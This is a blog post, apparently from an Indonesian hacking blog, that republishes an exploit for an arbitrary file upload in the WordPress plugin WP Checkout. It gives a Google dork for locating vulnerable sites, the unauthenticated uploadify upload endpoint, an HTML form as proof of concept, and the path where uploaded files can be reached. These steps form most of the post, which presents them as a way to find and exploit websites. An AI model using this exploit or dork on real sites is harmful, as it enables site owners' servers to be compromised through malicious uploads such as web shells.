a-ads

Selasa, 13 Juni 2017

Unknown

WordPress Plugins WP Checkout - Arbitrary File Upload

    Tidak ada komentar:



# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

Indonesian h4x0r.

Unknown

About Unknown -

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

Subscribe to this Blog via Email :

© Copyright 2015 Indonesian 1337. Designed by Bloggertheme9 | Distributed By Gooyaabi Templates. Powered by Blogger.